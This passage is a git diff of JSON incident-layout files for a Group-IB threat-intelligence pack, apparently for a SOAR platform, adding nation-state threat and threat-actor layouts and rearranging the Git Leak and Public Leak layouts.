"fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-11ee7ad0-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "1b92bdd0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorcountry", + "height": 22, + "id": "25bad6d0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactordescription", + "height": 44, + "id": "2b5ddce0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorgoals", + "height": 22, + "id": "2e990ab0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "317d17d0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorlabels", + "height": 22, + "id": "34752220-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "370d3220-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorroles", + "height": 22, + "id": "3ce1cf80-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorcve", + "height": 22, + "id": "402b2e20-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "listId": "caseinfoid-11ee7ad0-71ac-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsexpertises", + "height": 22, + "id": "4b3fca00-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsmalware", + "height": 22, + "id": "4df3ed80-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsregions", + "height": 22, + "id": "50a85f20-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 12, + "listId": "caseinfoid-11ee7ad0-71ac-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalssectors", + "height": 22, + "id": "7ad6dd30-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 13, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "1a0970e0-8493-11ef-87c7-cfae65ac92d0", + "index": 14, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from GIB", + "static": false, + "w": 2, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-c34d05a0-7bfa-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "28b4dcf0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "43ca4de0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "46ea2b80-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateupdatedat", + "height": 22, + "id": "7dba9c30-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "GIB Dates", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b28df5e0-822a-11ef-9517-e9064fff04ea", + "items": [ + { + "endCol": 2, + "fieldId": "gibnationstatecybercriminalsthreatactorreportstable", + "height": 22, + "id": "b858cf40-822a-11ef-9517-e9064fff04ea", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor Reports", + "static": false, + "w": 1, + "x": 1, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Nation-State Cybercriminals Threat Actor Layout", + "name": "GIB Nation-State Cybercriminals Threat Actor Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json new file mode 100644 index 000000000000..ed49eb784046 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json @@ -0,0 +1,643 @@ +{ + "description": "Layout for Nation-State Cybercriminals Threat", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-ba6f3aa0-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "05afc160-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreattitle", + "height": 22, + "id": "0ad0ed40-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatcountries", + "height": 22, + "id": "114f3820-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatdescription", + "height": 44, + "id": "24719880-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatexpertises", + "height": 22, + "id": "27444080-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibistailored", + "height": 22, + "id": "2b856ca0-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorlabels", + "height": 22, + "id": "2e55cab0-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatlangs", + "height": 22, + "id": "31343280-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatregions", + "height": 22, + "id": "340d4320-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatreportnumber", + "height": 22, + "id": "37de6f60-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatsectors", + "height": 22, + "id": "3efeedb0-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "2a2c25d0-8493-11ef-87c7-cfae65ac92d0", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-bb23e4a0-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "e05eaf70-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "e40b63c0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "e67cd8f0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "e8d76ac0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-bbeb5350-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibnationstatecybercriminalforumstable", + "height": 22, + "id": "ae4647d0-822f-11ef-9517-e9064fff04ea", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Cybercriminal Forum Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-c55e4d20-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorcountry", + "height": 22, + "id": "d0ccefe0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "d45be300-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "d6e15560-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "d95da000-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-6acad460-7bfb-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "16f59990-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "19d93180-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "1f038520-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatepublished", + "height": 22, + "id": "219ca690-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 4 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Nation-State Cybercriminals Threat Layout", + "name": "GIB Nation-State Cybercriminals Threat Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json index 7dcfa422b3f0..eba2068f5639 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json @@ -58,7 +58,7 @@ "fieldId": "sourcebrand", "height": 22, "id": "incident-sourceBrand-field", - "index": 4, + "index": 3, "sectionItemType": "field", "startCol": 0 }, @@ -67,7 +67,7 @@ "fieldId": "sourceinstance", "height": 22, "id": "incident-sourceInstance-field", - "index": 5, + "index": 4, "sectionItemType": "field", "startCol": 0 }, @@ -76,7 +76,7 @@ "fieldId": "playbookid", "height": 22, "id": "incident-playbookId-field", - "index": 6, + "index": 5, "sectionItemType": "field", "startCol": 0 } @@ -86,7 +86,8 @@ "static": false, "w": 1, "x": 0, - "y": 0 + "y": 0, + "maxW": 3 }, { "h": 2, @@ -97,7 +98,8 @@ "type": "notes", "w": 1, "x": 2, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -109,7 +111,8 @@ "type": "workplan", "w": 1, "x": 1, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -122,7 +125,8 @@ "type": "linkedIncidents", "w": 1, "x": 1, - "y": 8 + "y": 12, + "maxW": 3 }, { "displayType": "ROW", @@ -134,7 +138,8 @@ "type": "childInv", "w": 1, "x": 2, - "y": 4 + "y": 6, + "maxW": 3 }, { "displayType": "ROW", @@ -145,8 +150,9 @@ "static": false, "type": "evidence", "w": 1, - "x": 2, - "y": 2 + "x": 1, + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -159,7 +165,8 @@ "type": "team", "w": 1, "x": 2, - "y": 6 + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -173,7 +180,8 @@ "type": "indicators", "w": 2, "x": 0, - "y": 6 + "y": 10, + "maxW": 3 }, { "displayType": "CARD", @@ -231,7 +239,8 @@ "static": false, "w": 1, "x": 0, - "y": 4 + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -272,7 +281,8 @@ "static": false, "w": 1, "x": 0, - "y": 8 + "y": 12, + "maxW": 3 }, { "displayType": "CARD", @@ -295,101 +305,146 @@ "static": false, "w": 1, "x": 1, - "y": 4 + "y": 6, + "maxW": 3 }, { - "description": "", "displayType": "ROW", "h": 2, "hideName": false, - "i": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", + "i": "caseinfoid-9aa853c0-71a5-11ef-8c49-f9d8b5e80cf6", "items": [ { - "endCol": 4, - "fieldId": "gibdateofdetection", + "endCol": 2, + "fieldId": "gibadmiraltycode", "height": 22, - "id": "9d3533a0-72c7-11eb-9bde-efbce7414b24", + "id": "0e02d070-71a6-11ef-8c49-f9d8b5e80cf6", "index": 0, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibseverity", + "endCol": 2, + "fieldId": "gibcredibility", "height": 22, - "id": "ccadc250-72c7-11eb-9bde-efbce7414b24", + "id": "149c6b80-71a6-11ef-8c49-f9d8b5e80cf6", "index": 1, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "1a589ee0-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "20407620-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-9f3b9780-71a5-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "adaddd50-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, "fieldId": "gibleakedfilename", "height": 22, - "id": "b14a4640-7368-11eb-8aef-c39e29f029fe", + "id": "b4695840-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibgitsource", + "height": 22, + "id": "aea81fd0-765b-11ef-847d-79ba38ba7b17", "index": 2, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibportallink", + "endCol": 6, + "fieldId": "gibsource", "height": 22, - "id": "daf41620-72c7-11eb-9bde-efbce7414b24", + "id": "b9f1f880-71a5-11ef-8c49-f9d8b5e80cf6", "index": 3, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibrepository", + "endCol": 6, + "fieldId": "gibdateofdetection", "height": 22, - "id": "d02523a0-7368-11eb-8aef-c39e29f029fe", + "id": "c2572bd0-71a5-11ef-8c49-f9d8b5e80cf6", "index": 4, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibsource", + "endCol": 6, + "fieldId": "gibdatecreated", "height": 22, - "id": "d296ab00-72c7-11eb-9bde-efbce7414b24", + "id": "c8a035e0-71a5-11ef-8c49-f9d8b5e80cf6", "index": 5, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibid", + "endCol": 6, + "fieldId": "gibportallink", "height": 22, - "id": "5ff80ed0-72c8-11eb-9bde-efbce7414b24", + "id": "4716a4e0-8493-11ef-87c7-cfae65ac92d0", "index": 6, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibrevisions", - "height": 44, - "id": "e3b4c4c0-7368-11eb-8aef-c39e29f029fe", - "index": 7, + "endCol": 6, + "fieldId": "gibosigitrepositoryfilestable", + "height": 106, + "id": "c5739110-7f19-11ef-8d06-c9295e097527", + "index": 8, "sectionItemType": "field", "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, - "w": 2, + "w": 3, "x": 0, "y": 2 } @@ -428,6 +483,5 @@ "name": "GIB OSI Git Leak Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "0.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json index 045318c29638..6536df8300de 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json @@ -86,7 +86,8 @@ "static": false, "w": 1, "x": 0, - "y": 0 + "y": 0, + "maxW": 3 }, { "h": 2, @@ -97,7 +98,8 @@ "type": "notes", "w": 1, "x": 2, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -109,7 +111,8 @@ "type": "workplan", "w": 1, "x": 1, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -122,7 +125,8 @@ "type": "linkedIncidents", "w": 1, "x": 1, - "y": 8 + "y": 14, + "maxW": 3 }, { "displayType": "ROW", @@ -134,7 +138,8 @@ "type": "childInv", "w": 1, "x": 2, - "y": 4 + "y": 10, + "maxW": 3 }, { "displayType": "ROW", @@ -146,7 +151,8 @@ "type": "evidence", "w": 1, "x": 2, - "y": 2 + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -158,8 +164,9 @@ "static": false, "type": "team", "w": 1, - "x": 2, - "y": 6 + "x": 0, + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -173,7 +180,8 @@ "type": "indicators", "w": 2, "x": 0, - "y": 6 + "y": 12, + "maxW": 3 }, { "displayType": "CARD", @@ -183,7 +191,7 @@ { "endCol": 1, "fieldId": "occurred", - "height": 22, + "height": 53, "id": "incident-occurred-field", "index": 0, "sectionItemType": "field", @@ -192,7 +200,7 @@ { "endCol": 1, "fieldId": "dbotmodified", - "height": 22, + "height": 53, "id": "incident-modified-field", "index": 1, "sectionItemType": "field", @@ -201,7 +209,7 @@ { "endCol": 2, "fieldId": "dbotduedate", - "height": 22, + "height": 53, "id": "incident-dueDate-field", "index": 2, "sectionItemType": "field", @@ -210,7 +218,7 @@ { "endCol": 2, "fieldId": "dbotcreated", - "height": 22, + "height": 53, "id": "incident-created-field", "index": 0, "sectionItemType": "field", @@ -219,7 +227,7 @@ { "endCol": 2, "fieldId": "dbotclosed", - "height": 22, + "height": 53, "id": "incident-closed-field", "index": 1, "sectionItemType": "field", @@ -231,7 +239,8 @@ "static": false, "w": 1, "x": 0, - "y": 4 + "y": 10, + "maxW": 3 }, { "displayType": "ROW", @@ -272,7 +281,8 @@ "static": false, "w": 1, "x": 0, - "y": 8 + "y": 14, + "maxW": 3 }, { "displayType": "CARD", @@ -295,101 +305,141 @@ "static": false, "w": 1, "x": 1, - "y": 4 + "y": 10, + "maxW": 3 }, { - "description": "", "displayType": "ROW", "h": 2, "hideName": false, - "i": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", + "i": "caseinfoid-3e13a780-71a6-11ef-8c49-f9d8b5e80cf6", "items": [ { - "endCol": 4, - "fieldId": "gibdatecreated", 